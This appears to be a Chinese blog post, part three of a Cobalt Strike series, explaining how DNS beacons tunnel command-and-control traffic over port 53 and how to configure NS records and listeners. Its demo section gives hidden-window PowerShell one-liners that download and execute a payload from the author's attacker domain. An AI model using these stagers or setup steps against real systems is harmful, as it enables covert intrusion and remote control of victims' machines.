Cobalt Strike(三)DNS beacon 的使用与原理
1.dns木马
dns木马因为隐蔽性好,在受害者不会开放任何端口 可以规避防火墙协议,走的是53端口 (服务器),防火墙不会拦截,缺点响应慢。
2.dns beacon的工作过程
在 dns beacon使用dns隧道的过程
受害者在执行我们的传输器下载完木马之后就会发出a记录的请求,受害者首先会请求本地的hosts文件 ,再去请求本地的dns 能不能告诉123456.test.1377day.com 的ip多少,如果本地dns存在记录就返回ip,没有就会去查找root 根dns 不存在记录, 接着就会访问com的dns 没有就会去查找dnspot的dns 如果都不存在 就会去查找名称服务器 的。 这个是就会访问 teamserver的服务器 在teasmserver的服务器上也有dns 刚好存在记录 就会返回ip 同时teasmserver 会有dns beacon的信息 返回受害者 受害者再请求危险的a记录到teamserver。 这就是dns beacon的工作过程。
3.DNS beacon的类型
windows/beacon_dns/reserve_http (传输数据小)
有效载荷通过HTTP连接分阶段。当您创建此侦听器时,请注意您正在配置主机和端口Cobalt Strike将使用通过HTTP分阶段此有效负载。当您选择设置此有效负载时,Cobalt Strike在端口53上站起来的DNS服务器。
beacon_dns/reserve_http(支持命令切换到该模式:mode dns)
将http通信方式,改为了使用dns的a记录方式进行通信。速度较慢,但非常隐蔽,推荐使用!
beacon_dns/reserve_dns_txt(支持命令切换到该模式:mode dns-txt)
同上,只是改为使用dns的txt方式进行通信,传输的数据量更大,推荐使用!
windows/beacon_dns/reverse_dns_txt (传输数据大)
有效负载使用DNS TXT记录下载和分级混合HTTP和DNS beacon。当您创建此侦听器时,请注意,您正在配置该有效负载将用于HTTP通信的端口。再次,Cobalt Strike知道在53端口站起来一个DNS服务器。
以上都是非持续性的工作。
4.域名创建ns指向
首先指向a记录test.1377day.com 指向 teamserver
接着创建三个ns记录 分别c1,c2,c3指向test.1377day.com
新建监听器
传输地址
设置好查看监听器
5.测试环境
nslookup
server test.1377day.com
123456(这个是任意的)
nslookup 123456.c1.1377day.com
dig +trace 123456.c1.1377day.com
6.实战演示
a记录
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://test.1377day.com:80/a'))"
dns-txt
ns txt记录
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://test.1377day.com:80/dns'))"
checkin 强制被控端(受害人主动请求)
转换协议
mode http dns dns-txt
———————————————————————————————为你,我愿化成天使守护你
Cobalt Strike(三)DNS beacon 的使用与原理相关推荐
- 150.网络安全渗透测试—[Cobalt Strike系列]—[DNS Beacon原理/实战测试]
我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!! 文章目录 一.DNS Beacon原理 1.DNS Beacon简介 2.DSN Beacon工作原理 二.DNS Bea ...
- Cobalt Strike|Beacon原理浅析
Hello大家好哇,我是你们可爱的lmn小姐姐,今天我们来研究一下Beacon的一些基础知识,如果有师傅没有看过这个系列之前的文章,可以点击下方图片阅读. Cobalt Strike 作为一种后渗透工 ...
- Cobalt Strike 之团队服务器的搭建与DNS通讯演示
luom · 2014/04/25 12:07 0x00 背景 Cobalt Strike 一款以metasploit为基础的GUI的框框架式渗透工具,Armitage的商业版,集成了端口发.服务扫描 ...
- Cobalt Strike使用教程——基础篇
本文主要介绍 Cobalt Strike 4.3 的基本功能及使用方法,具体分析和实战中使用放在另一篇讲解:Cobalt Strike使用方法--实战篇. 文章目录 一.基本介绍 (一) 目录结构 ( ...
- Cobalt Strike基本使用
Cobalt Strike简介 Cobalt Strike是一款由java编写的全平台多方协同渗透测试框架,在3.0版本之前它基于Metasploit框架工作,在3.0后的版本以独立成一个渗透测试平台 ...
- 神兵利器--Cobalt Strike
前言 经常看到披露出来APT(Advanced Persistent Threat) 高级持续性威胁报告,据目前我所了解到的有常用两种攻击手法还有更多种手法水坑式攻击和鱼叉式钓鱼邮件攻击手法.其实我也 ...
- # Cobalt Strike:使用已知的私钥解密流量-Part 2
博客系列:Cobalt Strike:流量解密 Cobalt Strike:使用已知的私钥解密流量-Part 1 Cobalt Strike: 使用已知的私钥解密流量 - Part 2(当前部分) C ...
- Cobalt Strike:使用已知的私钥解密流量 -Part 2
Cobalt Strike:使用已知的私钥解密流量 -Part 2 博客系列:Cobalt Strike:流量解密 Cobalt Strike: 使用已知的私钥解密流量 - Part 2(当前部分) ...
- # Cobalt Strike: 使用进程内存解密流量-Part 3
博客系列:Cobalt Strike:流量解密 Cobalt Strike:使用已知的私钥解密流量-Part 1 Cobalt Strike: 使用已知的私钥解密流量 - Part 2 Cobalt ...
最新文章
- android权限控制泄露,Android应用的权限泄露分析
- MyBatis中的selectKey
- java SSM框架
- python一维平滑滤波_高斯滤波器的原理及其实现过程(附模板代码)
- 判断一个Checkbox是否被选中
- JS实时检测文本框内容长度
- oracle中序号生成器,Oracle序列生成器
- 好铁不打钉,好男不当网管-----论网管的自我修养 ...
- 两种排序方法(直接判断)
- Django2.0中URL的路由机制
- Javascript 笔记(2)----闭包
- IIS7配置Gzip压缩
- 东芝300D粉盒清零
- Spring源码解析(一)下载及编译(版本5.2.x)
- 游戏研发人才学校培养、企业需求与个人快速成长,华科校友分享了这些实用观点
- 编程需要那些数学和计算机知识点,学习编程需要哪些基础?
- Jboot用@Cron失效
- 什么是证券市场?证券市场有哪些组成
- 用xgboost模型对特征重要性进行排序
- 一文搞懂0.1UF和10UF电容并联使用技巧